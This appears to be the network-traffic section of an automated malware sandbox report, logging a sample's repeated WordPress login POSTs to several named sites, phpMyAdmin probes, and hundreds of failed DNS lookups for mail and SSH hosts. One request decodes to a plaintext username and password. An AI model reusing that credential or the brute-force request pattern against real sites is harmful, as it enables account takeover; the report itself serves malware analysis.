Source: global traffic	HTTP traffic detected: POST /wp-login.php HTTP/1.1Host: amsantechnology.comAccept: /Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP%20Cookie%20checkUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://amsantechnology.com/wp-login.phpContent-Length: 136Content-Type: application/x-www-form-urlencoded
Source: global traffic	HTTP traffic detected: POST /wp-login.php HTTP/1.1Host: fortressrealcapital.comAccept: /Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP%20Cookie%20checkUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://fortressrealcapital.com/wp-login.phpContent-Length: 164Content-Type: application/x-www-form-urlencoded
Source: global traffic	HTTP traffic detected: POST /wp-login.php HTTP/1.1Host: norwegischlernen.infoAccept: /Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP+Cookie+checkUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://norwegischlernen.info/wp-login.phpContent-Length: 161Content-Type: application/x-www-form-urlencoded
Source: global traffic	HTTP traffic detected: POST /wp-login.php HTTP/1.1Host: fortressrealcapital.comAccept: /Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP%20Cookie%20checkUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://fortressrealcapital.com/wp-login.phpContent-Length: 138Content-Type: application/x-www-form-urlencoded
Source: global traffic	HTTP traffic detected: POST /wp-login.php HTTP/1.1Host: www.cabinet-orsika.frAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://cabinet-orsika.fr/wp-login.phpContent-Length: 150Content-Type: application/x-www-form-urlencoded
Source: global traffic	HTTP traffic detected: POST /wp-login.php HTTP/1.1Host: amsantechnology.comAccept: /Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP%20Cookie%20checkUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://amsantechnology.com/wp-login.phpContent-Length: 158Content-Type: application/x-www-form-urlencoded
Source: global traffic	HTTP traffic detected: POST /wp-login.php HTTP/1.1Host: norwegischlernen.infoAccept: /Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP+Cookie+checkUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://norwegischlernen.info/wp-login.phpContent-Length: 136Content-Type: application/x-www-form-urlencoded
Source: global traffic	HTTP traffic detected: POST /wp-login.php HTTP/1.1Host: fortressrealcapital.comAccept: /Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP%20Cookie%20checkUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://fortressrealcapital.com/wp-login.phpContent-Length: 146Content-Type: application/x-www-form-urlencoded
Source: global traffic	HTTP traffic detected: POST /wp-login.php HTTP/1.1Host: norwegischlernen.infoAccept: /Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP+Cookie+checkUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://norwegischlernen.info/wp-login.phpContent-Length: 144Content-Type: application/x-www-form-urlencoded
Source: global traffic	HTTP traffic detected: POST /wp-login.php HTTP/1.1Host: www.cabinet-orsika.frAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://cabinet-orsika.fr/wp-login.phpContent-Length: 170Content-Type: application/x-www-form-urlencoded
Source: global traffic	HTTP traffic detected: POST /wp-login.php HTTP/1.1Host: amsantechnology.comAccept: /Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP%20Cookie%20checkUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://amsantechnology.com/wp-login.phpContent-Length: 134Content-Type: application/x-www-form-urlencoded
Source: global traffic	HTTP traffic detected: POST /wp-login.php HTTP/1.1Host: fortressrealcapital.comAccept: /Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP%20Cookie%20checkUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://fortressrealcapital.com/wp-login.phpContent-Length: 152Content-Type: application/x-www-form-urlencoded
Source: global traffic	HTTP traffic detected: POST /wp-login.php HTTP/1.1Host: norwegischlernen.infoAccept: /Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP+Cookie+checkUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://norwegischlernen.info/wp-login.phpContent-Length: 147Content-Type: application/x-www-form-urlencoded
Source: global traffic	HTTP traffic detected: POST /wp-login.php HTTP/1.1Host: www.netzschnipsel.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://netzschnipsel.de/wp-login.phpContent-Length: 141Content-Type: application/x-www-form-urlencodedData Raw: 6c 6f 67 3d 6d 6d 6d 2e 70 6f 68 6f 74 6d 61 69 6c 26 70 77 64 3d 73 75 70 70 65 32 32 33 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 41 6e 6d 65 6c 64 65 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 25 33 41 25 32 46 25 32 46 77 77 77 2e 6e 65 74 7a 73 63 68 6e 69 70 73 65 6c 2e 64 65 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31 Data Ascii: log=mmm.pohotmail&pwd=suppe223&rememberme=forever&wp-submit=Anmelden&redirect_to=http%3A%2F%2Fwww.netzschnipsel.de%2Fwp-admin%2F&testcookie=1

Probes for web service weaknesses (weak passwords or vulnerabilities)

Source: http	HTTP: iisalessandrini.edu.it/phpmyadmin
Source: http	HTTP: eyegage.com/phpmyadmin
Source: http	HTTP: iisalessandrini.edu.it/phpmyadmin

Tries to resolve many domain names, but no domain seems valid

Source: unknown	DNS traffic detected: query: relay.terminatour-bohotmailing.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.gamma.ocm.ne.jp replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: smtp.hotmailhome.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.farma-aps.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.hotmail.demail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.schupp-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.heinzerlinghotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.hotmail.demail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.cdgcapitalbourse.ma replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.newhotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.utlohotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: zube-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.29hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.runyai-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.att.no replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.terminatour-bohotmailing.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.gamma.ocm.ne.jp replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.outlook.fr.sg replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.imao.ml replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.hoenighotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.ufer-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.x-erfolgsteam.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: hotmail-topmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: att.co.id replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: ftp.newhotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: hoenighotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.temxp.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.hotmailhome.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.att.in replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: relay.jtirit.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: smtp.farma-aps.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.gothic-concerts.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: smtp.smhotmaillang.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.ptotonmail.ch replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.hotmailjoy.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.hotmail.fr.ar replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.dancenight-express.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.rubypink.co.uk replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: smtp.kvapilova.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.ufer-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.dancenight-express.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.hotmail.fr.ar replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.outlook.fr.sg replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.jtirit.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.farma-aps.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.hotmail.demail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.heinzerlinghotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.aregods.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.undercover-bietigheim.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.hotmail.fr.tr replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.hotmail.demail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.zube-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.gothic-concerts.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.radiussystemllc.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.jtirit.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.jalds.org replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: smtp.rubypink.co.uk replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.jtirit.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.zube-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.runyai-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.spd-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: smtp.hotmail.demail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: hotmailjoy.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.smhotmaillang.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.hotmail.fryahoo.fr replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.sq-community.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.hotmail-topmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.generika-apotheke-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.tux4hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: smtp.ptotonmail.ch replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.att.no replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.rubypink.co.uk replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: smtp.imao.ml replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.att.in replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: mail.jtirit.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.undercover-bietigheim.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.hotmail.demail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.radiussystemllc.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gamma.ocm.ne.jp replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: sq-community.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.jalds.org replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.hotmail.fr.tr replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: esafrica.co.zw replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.kvapilova.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.generika-apotheke-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.hotmail-topmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.att.in replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: oulohotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.schupp-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.farma-aps.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.hotmailjoy.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.hotmail.fr.tr replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.scw-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.hotmail.fryahoo.fr replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.igs-ruelzheim.rp.lo-net2.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.att.no replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.scw-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.fos-elektronik.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.hotmail.fr.ar replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.hotmail-topmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.newhotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.imao.ml replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.ufer-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.esafrica.co.zw replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.dancenight-express.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.rubypink.co.uk replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.oulohotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.radiussystemllc.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.terminatour-bohotmailing.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.sq-community.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.esafrica.co.zw replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.outlook.fr.sg replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.att.in replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: smtp.hotmail.fr.ar replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.hotmail.fr.br replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.smhotmaillang.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.newhotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.hotmailjoy.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.fos-elektronik.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.ptotonmail.ch replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: smtp.hotmail-topmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.att.in replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: imap.scw-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.smhotmaillang.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.zube-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.radiussystemllc.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.undercover-bietigheim.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.spd-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.hotmail.fryahoo.fr replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.igs-ruelzheim.rp.lo-net2.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.att.no replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.hotmailhome.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.terminatour-bohotmailing.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.homehotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.outlook.fr.sg replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.utlohotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.esafrica.co.zw replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.homehotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.hotmail.fr.ar replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lavera2.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.runyai-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.hotmailhome.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: smtp.radiussystemllc.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.esafrica.co.zw replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.scw-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.heinzerlinghotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.heinzerlinghotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.ptotonmail.ch replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.att.co.id replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: pop3.tux4hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: hotmail.fr.ar replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.oulohotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.terminatour-bohotmailing.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.outlook.fr.sg replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.att.no replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: smtp.lavera2.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.farma-aps.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.lavera2.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.dancenight-express.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: smtp.hotmailjoy.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: smtp.undercover-bietigheim.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.hotmail.fr.ar replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.hotmail.fryahoo.fr replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.schupp-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.newhotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.runyai-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.generika-apotheke-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: hotmail.fryahoo.fr replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.x-erfolgsteam.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.gamma.ocm.ne.jp replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: smtp.oulohotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.homehotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.undercover-bietigheim.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: smtp.hotmail.fr.br replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: smtp.morr-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.smhotmaillang.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.kvapilova.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.scw-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: jalds.org replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.undercover-bietigheim.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.gamma.ocm.ne.jp replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: smtp.utlohotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.radiussystemllc.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.smhotmaillang.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.jtirit.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.hotmail.demail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.igs-ruelzheim.rp.lo-net2.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.farma-aps.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.farma-aps.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.outlook.fr.sg replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.att.no replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: smtp.ufer-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.kvapilova.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: smtp.hotmail.fr.tr replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.utlohotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: spd-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.x-erfolgsteam.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: heinzerlinghotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.joaz.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.zube-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.jalds.org replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.ptotonmail.ch replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.generika-apotheke-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.hotmail.fr.ar replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.hotmail.fr.tr replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.att.co.id replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: farma-aps.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.zube-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.ufer-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.schupp-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.homehotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: smtp.generika-apotheke-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.jalds.org replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.rubypink.co.uk replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.att.no replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: smtp.terminatour-bohotmailing.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: runyai-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.zube-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.rubypink.co.uk replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.morr-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: smtp.att.in replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: ssh.imao.ml replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.oulohotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: smtp.homehotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.jtirit.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.heinzerlinghotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.x-erfolgsteam.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.imao.ml replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.gothic-concerts.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: smtp.dancenight-express.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.hotmailhome.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.undercover-bietigheim.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.radiussystemllc.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: utlohotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ufer-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.aregods.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.architettosangiorgio.ch replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.hotmail.fr.tr replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.homehotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.esafrica.co.zw replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.hotmail-topmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.hotmail.fr.ar replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.outlook.fr.sg replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.lavera2.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.ufer-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: smtp.schupp-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: smtp.heinzerlinghotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.imao.ml replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.morr-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.29hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: morr-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: smtp.x-erfolgsteam.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.hotmail.fr.tr replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.hotmailjoy.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.generika-apotheke-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.hotmail.demail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.rubypink.co.uk replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.hotmail-topmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.generika-apotheke-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.scw-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.kvapilova.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.rubypink.co.uk replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.imao.ml replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.hotmail-topmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.morr-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.imao.ml replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.joaz.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.x-erfolgsteam.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.lavera2.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.att.in replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: ssh.newhotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: smtp.att.no replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.spd-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.tux4hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.hotmailjoy.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: smtp.joaz.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.undercover-bietigheim.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.heinzerlinghotmail.de replaycode: Name error (3)
